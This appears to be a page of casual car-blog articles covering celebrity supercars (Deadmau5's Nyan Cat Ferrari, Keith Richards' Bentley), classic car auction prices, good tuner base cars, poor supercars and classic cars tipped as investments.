Obviously if you are a singer, actor, model or well, whatever the Kardashians are, and have tons of cash splashing some of it on a great ride makes sense. And while there are the obvious choices – the standard Lambos, the basic Ferraris etc – some car crazed stars have stepped it up a notch when it comes to satisfying their lust for luxurious, high performance vehicles. And perhaps no one has built a better collection of such cars than Deadmau5

Deadmau5 , the DJ/producer/asshole (we didn’t say that, his fellow DJ and friend Skrillex did. Nice pal to have) who is loved by some and hated by many more but who still rakes in millions a year, is the proud owner of a number of high performance rides including a McLaren P1, McLaren 650S, Ferrari, BAC Mono, Ferrari 458 and a couple of ‘daily drive’ Porsches. His most notorious car so far however was the Purrari, a Ferrari 458 Spider he had wrapped with a Nyan Cat theme.

He successfully competed in the Gumball Rally with it in 2014 bringing both Tory Belleci from MythBusters and briefly, Lewis Hamilton for the ride:

After Gumball however, Ferrari USA complained about the Purrari bitterly (why?) and threatened legal action. Deadmau5 – whose real name is the far less groovy Joel Zimmerman- then sold it off to benefit cat shelters in his native Toronto (not such an asshole after all maybe) He has just replaced it with a Nyanborghini Purracan (Huracán) that he has been constantly trolling Ferrari with pictures of on social media (OK, still a bit of an asshole then)

Speaking of possible copyright infringement Deadmau5 also films and hosts his own version of Jerry Seinfeld’s Comedians In Cars Getting Coffee in which he allows various celebrities to ride in one of his many cars and enjoy the privilege of buying him a cup of coffee for his trouble. His guests have even included the rather controversial former Mayor of Toronto Rob Ford. He’s also been known to pull a shift or two as an Uber driver in his McLaren, something that is normally quite a shock for passengers. Well at least he gets some use out of his supercars and doesn’t just leave them sitting in the garage..

Footballers and snazzy cars go together like footballers and slightly vacuous glamour models. Making it into the big(ger) leagues these days basically requires that any footballer have at least one of each, and when it comes to the cars at least, they do tend to like multiples.

While there are the very obvious choices – like every car Cristiano Ronaldo owns, from his multiple Bugatti Veyrons to his numerous Audis and whatever Porsche he hasn’t crashed yet – some footballers take their hard earned (?) wages and put them into something rather more unique. But back when he had hair, and a contract with Manchester City, he treated himself to several very nice rides, the most memorable of which being this lovely black and pink Range Rover that certainly turned some heads (and possibly stomachs) as he pottered it around Manchester. And no, this car didn’t really belong to his missus, hers was white and red and monogrammed, but that’s another (nightmarish) story.

Mario didn’t hold onto the car for long though, as he ended up gifting it to teammate Urby Emanuel, who promptly stripped off the wrap and returned the car to its former pristine winter white colour. Which, according to ‘insiders’ Mario was actually a bit miffed about.

The relationship between Aston Martin and the James Bond movie franchise goes all the way back to the iconic film series’ third outing in 1964, ‘Goldfinger’. Director Guy Hamilton and his staff had reached out to all of the major sports car manufacturers in the hope of borrowing a flash car. All but Aston refused outright and even they had to be talked into not only agreeing to the use of their then flagship DB5 but agreeing to fit not just one, but two vehicles with extras like smokescreens and a revolving licence plate all installed by Aston engineers themselves.

Fast forward nearly 40 years and for the newest Bond flick, Spectre, which is set to premiere October 26 in the UK, with a worldwide premiere scheduled for November 6, Aston Martin have built and equipped ten Aston Martin DB10 models specifically for the movie and have recently released a video showcasing just what this beauty can do when in the hands of just the right stunt driver.

The driver in question here is three time Bond stunt driver and Manx rally driver Mark Higgins. And as you’ll see he really knows to handle this magnificent monster even if most others would not…

Another huge classic car auction, another ‘victory’ for Ferrari as one of it’s cars, almost predictably, takes the crown for highest bid at the RM Sotheby’s annual London sale which was held in Battersea Park a few weeks ago.

Over the course of the auction there were lots of absolutely magnificent cars on display and many of them were sold off for huge amounts of money. Here are just five of our favorites, including, of course, the million pound plus (plus, plus, plus) Ferrari that cost someone quite a pretty penny indeed.

1958 Ferrari 250 GT Tour de France by Scaglietti: £4,760,000

This particular auction crushing Ferrari 250 was actually expected to command and even higher price – £5.5m is what Southeby’s were hoping for – so it was a surprise to some, given the prices paid at other similar auctions recently that it fell short of that mark by more than a few quid. It is however a wonderful car, recently rebuilt by GTO Engineering and boasting 263bhp from a 3.0-litre V12 and reportedly in pristine driving condition despite being over 50 years old.

1992 Ferrari F40: £845,600

This is a truly pampered little beauty as it’s single original owner had only ever logged 3,000 original miles on the clock. As some of you may already know this was the last car to be built under the supervision of the great Enzo himself, who added a twin-turbo 2.9-litre V8 with 478bhp that truly packs some hair curling power.

1965 Aston Martin DB5 Vantage: £784,000

This racing thoroughbred was just one of 40 right hand drive Vantage saloons ever built and had he been offered the chance James Bond would probably loved to get his hands on this version, but it was a little to rare to be loaned out as a movie prop.

Recently retuned and refurbished, the model at auction was offering the lucky buyer an upgraded 4.0-litre straight-six engine, new cam timing, and triple twin-choke Weber carbs. Power had been boosted to 40bhp over the regular DB5 to 325bhp allowing what is still a truly stunning looking car to make it from 0-60 in 6.5 seconds.

1995 Bugatti EB110 Super Sport: £627,200

Lighter than it’s ‘child’ the Veyron this Bugatti beauty still boasts quad-turbocharged 3.5-litre V12 with 603bhp, a top speed of 216mph and a 0-60 time of 3.2 seconds. this particular model was one of the last of the SS brand to roll of the production line and the fact that it’s only racked up less than 10,100km in 20 years made it even more of a great score for the winning bidder.

1975 Lancia Stratos HF Stradale by Bertone: £308,000

According to the Sotheby’s brochure this Seventies classic would be sure to “bring a huge smile to the face of not only its driver, but also everyone who sees and hears the car go by… usually sideways.” A rather accurate summation we think of a car that was first registered in Italy in October of 1975 and has only ever known life in a garage for the most part, unlike some of its contemporaries that were such a hit on the rallying circuit.

Almost completely mechanically untouched the car still boasts 192 bhp from a 2,418 cc DOHC Dino V-6 engine with triple Weber carburettors and still looks pretty spacey, as Bertone intended, some 40 years after its ‘birth’.

Keith Richards’ Customized Bentley Sells for £763,100 at Goodwood Revival

A great deal goes on during the Goodwood Revival weekend, including several auctions of some seriously cool cars. One of the cars on the block in 2015 was a 1966 Bentley S3 Continental Flying Spur nicknamed ‘Blue Lena’, a car that had a rather notable former owner; Rolling Stones wildman Keith Richards.

Aside from the fact that the car is a true example of a Bentley at its finest, boasting a 6.2-litre V8 engine and a newly restored beige kid leather interior the car, which Richards named after one of his musical idols Lena Horne, features several erm, unusual, mods commissioned by Richards that you won’t find on any of its surviving peers.

There is, for example, a ‘secret compartment’ built into the frame for the purpose of concealing of various (illegal) substances. The windows were also heavily darkened and a Phillips record player was built into the boot. There is also a pair of loudspeakers behind the front grille that Richards’ then paramour, Anita Pallenberg used to amuse herself with by impersonating a policewoman and barking odd instructions to bewildered motorists.

Richards sold the car in 1978 and although it underwent five years of painstaking restoration before heading to the auction block at Goodwood all of his ‘special mods’ remain in place, which probably helped its eventual price climb up to over three quarters of million, which is actually a heck of a lot less than he sold it for years ago, a fact that may not make him too happy..

Top 5 Compact Sports Cars for the Home Tuner

Not everyone can go out and plonk down the cash for a Porsche 911 or even a top of the range BMW M3 but, as home tuners have been proving for decades, that does not have to be a bar to owning and driving an affordable, high performance sports compact that really goes. The trick is starting off with the right base car. These five compact sports cars have been winners since the first day they hit the lots but have also proved to be exceptionally fun to modify and in the hands of a dedicated tuner can become something even more special.

Despite all of the competition somehow the Honda Civic has managed to hold onto its crown as the tuner car of choice for years now. All of the big name tuning shops do a few versions, even Honda’s own Mugen Division – and in garages and sheds the world over you can find a countless number of Civics in various stages of transformation.

The fact that the Civic has such a rep for longevity helps as does the fact that usually they respond well to all kinds of engine swaps (a big favorite right now is a CR-V and RSX mashup that can pack a real punch) And in the right creative hands you make a Honda Civic look as cool as any other high performance compact even though you may have only paid a fraction of the price initially.

Before it was rechristened as the RSX the third generation Acura Integra may have been the most faked car of all time. The number of tuner kids who tried to get away with slapping an Type R sticker on a regular Integra to gain extra street cred was massive. But the simple fact is you don’t have to resort to that kind of fakery to get a truly great car. From the base model to the much coveted Type R itself these cars are flexible, easy to work with and can be used as the base of something truly great.

This is a car that looks like it’s dying to get out and race from the get go and it’s seemingly indestructible nature makes it a tuner’s dream. A great example of a carmaker actually listening to its fans and customers the Evolution was once a Japan only offering but pleas from the masses saw the company bring it to the US. With even just light to moderate tuning this baby can keep with the best of the ‘Vettes and look sharp doing it to boot.

As good as the Evo is it has serious competition in the form of the WRX STI. Benefiting, as all Subaru models do, from standard AWD it’s a beast on streets and rally circuits alike. If you happen upon one of the originals with those rather strange bubble headlights you might want to swap those out but do us a favor please WRX dudes? No more bronzed out wheels? They really do kinda kill the naturally sleek and sexy vibe.

Although it will never set any speed records the Miata is some of the best fun you’ll ever have driving a smaller car. Sure it’s pretty minimalist but that’s part of the appeal and the fact that it enjoys such a huge aftermarket presence means it’s really not hard to get your hands on one of these. And for those who scoff this one of as too lightweight and superficial? Drive one and then try to tell us that you don’t have a change of heart.

Supercar is a phrase that’s thrown around a great deal these days but as we all know not all supercars are created equal and yes, even those companies whose vehicles are usually considered to be the very definition of the word have, at one point in time, created a car that it not so much a supercar but a super crap car.

In compiling this list we did not simply choose the fugliest cars but fugly cars that also had some serious difficulties in the actual engineering department, truly making them duds of the super car world.

1980 Lamborghini Countach

In actual fact back when it hit the showroom in the early days of the Eighties this ‘futuristic’ Lambo was quite a hit; but many only with teenage boys who thought a poster of it looked uber cool next to Farrah Fawcett’s or some similarly busty blonde.

In real life though it was a real clunker. The clutch could only be properly depressed by someone who had recently been in training for the World’s Strongest Man, maneuvering the shifter required a degree in physics and the ride was so rough that the term ‘spine tingling’ can’t be applied but ‘spine crushing’ would be highly appropriate. On the upside though the few remaining examples of the Countach still around today have aged a lot better than many other 80’s pinups..

1980 Ferrari Mondial 8

Another child of the very early 1980s, the Ferrari Mondail 8 was a very half heated attempt on the company’s part to ‘reach out’ to the lower income market they usually never served. So the fact that the engine was 7-year-old 214 HP squib shoved into a badly redesigned 308 body is perhaps no surprise. Weird looking (even for the 80s) and a bad performer the Mondail 8 failed to impress anyone and Ferrari went back to doing what they do best; making cars you won’t be able to afford until you hit the lottery.

1990 Aston Martin Virage

Good old James Bond may love his Astons but we guarantee he’d never been seen dead in this one. A rare misstep on Aston Martin’s part produced a mutated Frankencar that ‘boasted’ Audi headlights and VW Scirocco taillights and an interior filled with parts salvaged from GM, Ford and Jaguar. Even the automatic transmission was from Chrysler and the actual styling was pretty awful by Aston standards to boot. Not even badge prestige could save this one and it (mercifully) died a quick death so that the company could get back to better things.

2006 TVR Sagaris

It’s a real shame that this is how iconic British automaker TVR – famous for cramming huge engines into wild bodies with gleeful abandon but somehow making it all work – had to go out. The Sagaris was not really ugly at all, but its handling was, laughably so. Add to that the fact that the build was truly shoddy and the reliability was zero the last car the company made was, sadly, really not one to remember.

2003 Mercedes-Benz SLR McLaren

Technically this should have been a sure fire winner. One of most successful teams in Formula One history in bed with one of the most iconic European automakers, on paper it sounded like the Mercedes-Benz SLR McLaren would be a supercar fan’s dream come true.

Sadly though it was not to be. The made for the road not the track body was bloated and awkward and the face almost downright ugly. The handling was poor, hampered by the fact that the car weighed a whopping for its class two tons. Constant disagreements between the two teams also resulted in a clumsy, poorly designed interior and overall the potential of such a stellar partnership was just never realized and it’s offspring died a quiet death very quickly.

Five Future Classic Cars That Are Great Investments Right Now

Still stunned by the prices some of those classics fetched at the Pebble Beach Auctions? The early 1600 series Duetto Spiders are truly fabulous cars in every way, from their ‘summer romantic’ looks to it’s delicate but nifty handling and excellent twin cam engine. They tend to be priced at around $20,000 – $25,000 right now (although we have seen them cheaper if you’re willing to put in a little work) but have the potential to be worth a great deal more in the future while also looking very pretty in or out of the garage.

This is a car that is already considered a ‘collectible’ as a mere 1,400 rolled off the line in a single model year – 2004 – and then were never produced again. The M3 is almost always a good bet and the E46 was certainly a very fine example of the class and the CSl was the very best of bunch. It is exceptionally lightweight and the paddle shift givers it a racing edge that is rather exhilarating. Finding a low mileage version of one of these babies might not be easy, but if you can you’ll be investing in pretty much a sure fire future classic.

BMW 3.0 CSL

Sticking with the Germans, this Seventies gem is another classic in the making well worth keeping an eye out for. Great looks, great engine and fabulous performance, along with quite the impressive motorsport track record all set it up for a bright future on the classics market. Once again it was produced in limited quantities – 1,200 at most – mainly because it comes from an era when motorcars were still sold on a walk in basis – but good condition models are out there for $50,000 or so and while that sounds like quite a bit they have the potential to be worth a great deal more not too long from now.

Yes, the Porsche 996 Turbo does suffer a little perhaps, reputation wise anyway, right now for the fact that it has very Boxter-esque front end styling but as a great example of a well engineered, does what its supposed to Porsche the 996 Turbo is currently highly underrated. And as the 930 and 993 Turbos continue to climb the value ladder into the stratospheric range a 996 would be a great investment to hedge your bets on right now.

We all know that Ferrari still dominates the high value classic car market – you only have to glance at the 2015 Pebble Beach Top to see that – and this four person may be one of the best ‘sleeper’ investments that can be made in a Ferrari right now.

It’s styling is something that some may raise a bit of an eyebrow at but it is a front-engined V12 from the classic Ferrari GT era and some huge sellers already carry that GT badge. You can also still pick up a decent model for less than $50,000 so if you wanted to get in on what may end up being quite the investment in Italian greatness then now’s the time to do it.
